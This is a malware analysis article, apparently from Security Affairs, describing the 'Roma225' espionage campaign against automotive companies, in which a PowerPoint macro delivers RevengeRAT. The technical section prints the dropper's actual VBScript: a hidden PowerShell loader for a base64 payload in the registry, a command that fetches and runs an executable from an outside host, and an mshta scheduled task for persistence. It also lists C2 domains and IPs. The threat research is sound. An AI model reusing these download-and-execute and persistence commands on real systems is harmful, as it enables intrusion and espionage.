‘Roma225’ -The Cybaze-Yoroi ZLab researchers investigated a recent espionage malware implant weaponized to target companies in the automotive sector.

The malware was spread through well-written phishing email trying to impersonate a senior partner of one of the major Brazilian business law firms: “Veirano Advogados”.

The malicious email intercepted during the CSDC operations contains a PowerPoint add-in document (“.ppa” extension),  armed with auto-open VBA macro code.

- SmdBweMpsSj6SP7LpmN g2WZaWwe2UY56p62 OUcadcJSUvVah6WmJnhjQ7gUrpPhL2BFR 17kB9cAlhcLSL1U9qrKq9I a7WfGOv sciNt6FjuwgckyhusTJ6WdkQlYmhzOkYM - ‘Roma225’ campaign targets companies in the Italian automotive sectorSecurity Affairs
Figure 1. Popup displayed at the .ppa file opening

Technical analysis

The macro code in the .ppa file contains a simple instruction invoking the “mshta.exe” tool to download and execute the next-stage of the dropper retrieved from “hxxps://minhacasaminhavidacdt.blogspot[.com/”.

- zMObmOznBBQ7d9EV1Oni9yY2097apIVxKPnAEbj8XhwrgP3jGAf8tOpgpfTSkpfDH7LaFEBNRHV1dmHYm ZhW7VTc1VZ0HlA3biAM3gGjmG9nCRh4jXKjW0BhmnBhKHTVHN8apw - ‘Roma225’ campaign targets companies in the Italian automotive sectorSecurity Affairs
Figure 2. Macro extracted from .ppa document

The Blogspot hosted web page downloaded by mshta.exe appears innocent-looking  to a quick skim through: opening it into the browser shows a perfectly rendered work-in progress blog page.

- dMqLvlbozR8YVM9c3WUBbA1hq9HwfcQxprwmBhwYDuapGBQ6wFIY2pE QZrp8i0gIBINL7uaxfLW fY9aJaDIWK2uDJ av3qHv0 bA oYHlLDWZwWOvdfQZzjrKFkuFs2unAmAc - ‘Roma225’ campaign targets companies in the Italian automotive sectorSecurity Affairs
Figure 3. Home page of the Blogger drop url

But a deeper inspection of its source code reveals an interesting snippet inserted into an invisible blog post: this ghost article contains VBScript code.

- Zg x7tST 65AcV9BdSRO08ysalS5IMZ2IwutLCPE4SYSf7DFsuLL6w5U52s96l5ILR O UROsFni0np4yEK9YsiWCdf 94pcZdyDAiWCDT w guXMRh0G7MpvL Mm4HW0EIgU9E - ‘Roma225’ campaign targets companies in the Italian automotive sectorSecurity Affairs
Figure 4. Visual Basic Script hidden behind the web page

It’s funny to see the malware author tried to attribute the paternity of the script to “Microsoft Corp.”, adding pieces of comments belonging to legit Microsoft utilities:

‘Update———————————————————————————————
‘ Copyright: Microsoft Corp.

‘ This script is designed to be used only for scheduled tasks(s).
‘ There is no extensive error check, and will not dump the output from the Powershell CmdLet.

‘ Usage: SyncAppvPublishingServer {cmdline-args(passthrough to cmdlet)}

These comments are in fact part of the “SyncAppvPublishingServer” utility, commonly deployed into Windows 10 machines at “C:WindowsSystem32SyncAppvPublishingServer.vbs”. Anyway, the remaining part of the script is responsible to execute a series of malicious actions:

  • Store a base64 encoded version of the “RevengeRAT” payload into registry key located at “HKCUAppEventsValues”
CreateObject("Wscript.Shell").regwrite "HKCUAppEventsValues", "TVqQAAMAAAAEAAAA//8AALgAAA.....[continue]" , "REG_SZ"
  • Decode and execute of the stored payload
Set A0102030405 = CreateObject("WScript.Shell")
Dim CDT0908087CDT
CDT0908087CDT = "cmd." + "exe /C rundll32." + "exe javascript:""..mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""cmd." + "exe /c power" + "shell -" + "Execution" + "Policy Bypass -windows" + "tyle hidden -noexit - [Reflection." + "Assembly]::Load([Convert]::FromBase64String((Get-ItemProperty HKCU:AppEvents).Values)).EntryPoint" + ".Invoke($N" + "ull,$" + "Null)"",0,true);" 
A0102030405.run CDT0908087CDT, vbHide
  • Create and execute another VBScript into  “%AppData%LocalTempZ3j.vbs”, capable to download a new payload from the remote destination “hxxp://cdtmaster.com[.]br”
Set XbonXo = CreateObject("WScript.Shell")
Dim XoowA83AC
XoowA83AC = "c" + "M" + "d /c cd %TEMP% &@echo Z6h = ""h" + "t" + "tp://cdtmaster.com.br/Document." + "mp3"">>Z3j.vbs &@echo M2l = M5t(""R]Qc[Sb<SfS"")>>Z3j.vbs &@echo Set M1s = CreateObject(M5t(""[af[[email protected]<f[ZVbb^""))>>Z3j.vbs &@echo M1s.Open M5t(""USb""), Z6h, False>>Z3j.vbs &@echo M1s.send ("""")>>Z3j.vbs &@echo Set E3i = CreateObject(M5t(""OR]RP<ab`SO[""))>>Z3j.vbs &@echo E3i.Open>>Z3j.vbs &@echo E3i.Type = 1 >>Z3j.vbs &@echo E3i.Write M1s.ResponseBody>>Z3j.vbs & @echo E3i.Position = 0 >>Z3j.vbs &@echo E3i.SaveToFile M2l, 2 >>Z3j.vbs &@echo E3i.Close>>Z3j.vbs  &@echo function M5t(N3y) >> Z3j.vbs &@echo For S2r = 1 To Len(N3y) >>Z3j.vbs &@echo E0k = Mid(N3y, S2r, 1) >>Z3j.vbs &@echo E0k = Chr(Asc(E0k)- 14) >>Z3j.vbs &@echo G3f = G3f + E0k >> Z3j.vbs &@echo Next >>Z3j.vbs &@echo M5t = G3f >>Z3j.vbs &@echo End Function >>Z3j.vbs& Z3j.vbs &dEl Z3j.vbs & timeout 2 & DOCUMENT.EXE"
XbonXo.Run XoowA83AC, vbHide
  • Finally, the creation of a new task running again the “mshta.exe” utiliy with the “hxxps://pocasideiascdt.blogspot[.]com/” parameter every two hours. This URL points to web page which actually is a mirror of the “https://minhacasaminhavidacdt.blogspot[.]com/” one.
Dim OUGo57658586GFFJHG
Set OUGo57658586GFFJHG = CreateObject("WScript.Shell")
asdmmmc= "c" + "Md /c Sc" + "hTa" + "sks /Cre" + "ate /sc MIN" + "UTE /MO 120 /TN OfficeData /TR ""m" + "sh" + "ta." + "exe h" + "ttp" + "s://pocasideiascdt.blogspot.com/"" /F "
OUGo57658586GFFJHG.Run asdmmmc, vbHide
self.close
- hmYZLbGJo6huNk7N5DCSF4H NSeppeKBKR9kM91ZwaC GLRFoQ8AxexQADRo9OEbJHBL39ZKdV8AkE FLgxCGpJJj62rvScoJBc9cEfefvnO3gYhdMHf4xkBopV1NtAUsNFqmv0 - &#8216;Roma225&#8217; campaign targets companies in the Italian automotive sectorSecurity Affairs
Figure 5. Scheduled task for persistency

Summing up, the last stages of the infection chain are designed to install a RevengeRAT variant hidden into a regkey and run the “outlook.exe” executable extracted by the “Document.exe” binary, retrieved from “hxxp://cdtmaster.com[.]br/Document.mp3”.

The following image briefly shows the malware infection chain:

- nRBGNKiX AqGAxGDkgdBDSbeto3tqs9ELhnYemdhwVg4YPgNLOu5c kd6qc cTReg6nG5RplVaJMxVsaAnALhIq KCLkaks3ARRZ81EbgJMoSRvGCx98lEqy4icpnDxWOz8NaQc - &#8216;Roma225&#8217; campaign targets companies in the Italian automotive sectorSecurity Affairs
Figure 6. Roma255 infection chain

RevengeRAT Payload

Once executed, the RAT immediately contacts its command and control servers sending victim machine’s information. In the analyzed sample, the author configured two different C2 destinations: “office365update[.]duckdns.org” and “systen32.ddns[.]net“.

- GrLzc7TB PG5qvUNxF 7WnR0q0U6OClAjtDNPKCth0Y4rBgSpKo3ppO2npULjBSwYjxjG9ZW8aHKyj3ZmM8pY1M1pf KMNcAKHy2zHgYM1cb EUEitlZ8NbtEiZlu2jK0r7n Vo - &#8216;Roma225&#8217; campaign targets companies in the Italian automotive sectorSecurity Affairs
Figure 7. Configuration of the RevengeRAT

If one of these is down, the malware falls back to the other one. At time of writing, both the remote C2 were down, so it was only possible to emulate the server behavior in order to analyze the information sent by the RAT.

Anyway, the malware establishes a TCP connection with the server and sends to it the following stream:

- 91NSIBIDBU1TDcWE5CrfwTpnpkjHtWP6MY0ua3AKcfs4vHua9NbN5eOL5Rdarjg7ycLRfW1vTfzTo9RLlFzeGfzf1zsJqS85dLRVhsK7utf 8mW4U1Z8PPjjlh3bEO8bEvGtB80 - &#8216;Roma225&#8217; campaign targets companies in the Italian automotive sectorSecurity Affairs
Figure 8. RevengeRAT check-in 

At first sight, it’s possible to spot a repeated sequence of chars used as separator between the data fields:

roma225

This string have been chosen by the attacker during the preparation of the malware, using the customization functionalities provided by the RevengeRAT builder. Splitting and decoding the data stream, information becomes clearer:

- lH25chV P6rY0PKVh4cVPAYKjyvoQ u2JMdeKQsN7Kq vFdCKOb1kSitk00CI4oHSL8EIuBIVvVuXdYe3CQQFvyevxLXG5j5Y98ss4s84959VOsyc4VOJaKBmC6qo9ftWvLOgzE - &#8216;Roma225&#8217; campaign targets companies in the Italian automotive sectorSecurity Affairs
Figure 9. decoded check-in data

As told before, the C2s were unresponsive at time of writing, however their latest IP resolution indicates the infrastructure of the attacker could be located in different countries.

For instance, the domain “office365update[.]duckdns.org” resolved to the 184.75.209.169 IP addresss, geolocated in Canada.

- DkQu3dDtPDCWe CRg4FEw98WFV26bOjtTtfrYk PtjED8SzxbT96WxqEkpe19hDYQoiEdgIUxyq4qHlK38IlkvGxVZTqo2iXsU jA2FO8c153IjYJVR oBC qYhrhCS4WdvJR6I - &#8216;Roma225&#8217; campaign targets companies in the Italian automotive sectorSecurity Affairs

Moreover,  “systen32.ddns[.]net” resolved to the 138.36.3.228 IP, geolocated in Brazil.

- yTE  dbIEPpaxA0tIqxu2i aJUXJ2XhSLCrncqXLqj  KJirr9537SM1C2gxzZVkHTagWIgHZdmiUYGl9Nnagod3IoWWuqo1fY98BYS nB6jgkFmZVU0Z7zho2FiPhqrExEXNt0 - &#8216;Roma225&#8217; campaign targets companies in the Italian automotive sectorSecurity Affairs

Document.exe

- oCw2tnp2m7sk3rzzZLsz9n 80z1aqI1N Mu4O7STDlJ0GUFLFgYnsY yxvYvPQuRDb5m67o1euBOQwnYobp1IruoFIaePlXa5m0 6H3TZZ ZNbn3Wp3NzAanfOXw5ZXxE4O3zO4 - &#8216;Roma225&#8217; campaign targets companies in the Italian automotive sectorSecurity Affairs

The “Document.exe” file is hosted at “cdtmaster.com[.]br” and is actually downloaded into the victim machine by the “Z3j.vbs” script. This PE32 file is characterized by the Pokemon Megaball image used as program icon and its unique purpose is to deploy and run the “Outlook.exe” payload.

Extracting static PE information from this last sample, reveals references to the “SendBlaster” application, a program used to deliver newsletters. Here, another interesting fact comes up: this product is currently developed by the Italian firm eDisplay Srl, so, in addition to the “roma225” separator, represents another direct reference to the Italian landscape.

- Jnz0bB7dgktaRcm4fuBAfMWJFDWVJSLXIwgIoV9Yoa4GtDnQ4Spam1BavJVjoOeuAo96RzMq9Q6Bzo2fxBxtJN1ZyIzpOl0FYmVxNrMQ9gwuMkWlHoSZRta8oNzAIUorxKvtiLE - &#8216;Roma225&#8217; campaign targets companies in the Italian automotive sectorSecurity Affairs
Figure 10. Outlook.exe static information 

When the “Outlook.exe” payload is executed, it remains apparently quiet: no outgoing network traffic or file system modifications; however it binds a listening TCP socket on localhost: “tcp://127.0.0.1:49356“.  

Cybaze-Yoroi ZLab researchers are still dissecting the Outlook.exe sample to extract its real behavior.

Conclusions

After this first analysis, it’s difficult to attribute the attack to a specific threat actor. In the past, RevengeRAT variants were also used by APT groups such as The Gorgon Group, the enigmatic threat actor tracked by the Unit42 researchers, author of cyber espionage campaigns against UK, Spain, and US governmental organization. However, the source code of the RAT has been publicly leaked few years ago and could be actually part of a multitude of cyber arsenals, more or less sophisticated. 

Anyway, there are TTP in common with Unit42 report, such as the usage of shared infrastructure (in the specific case the Blogger service) as drop-server and other popular RAT as final backdoor (i.e. njRAT).  

In fact, the “cdtmaster.com.]br” hosts other suspicious files such as the “nj.mp3” binary, which actually is a njRAT variant. All the other files are still under investigation.

- vb9bU1qeqetqI8cjNXvDqNPUS5FUUAC1yF3RSyNmLuR501ZBJPWQV8 XgtXs7AKSDBKCPe1np1Pdc77TBPsSFujec4A8Fbz86f DDtk5RZF13e0M1CblKpVQUm niUclI6u2fws - &#8216;Roma225&#8217; campaign targets companies in the Italian automotive sectorSecurity Affairs
Figure 11. Malware hosted on ctdmaster.com[.br

Technical details about the Roma225 compaign, including Indicators of Compromise (IoCs) and Yara rules are reported in the analysis published on the Yoroi blog.

Pierluigi Paganini

(SecurityAffairs – Roma225, cyberespionage)






Source link

LEAVE A REPLY

Please enter your comment!
Please enter your name here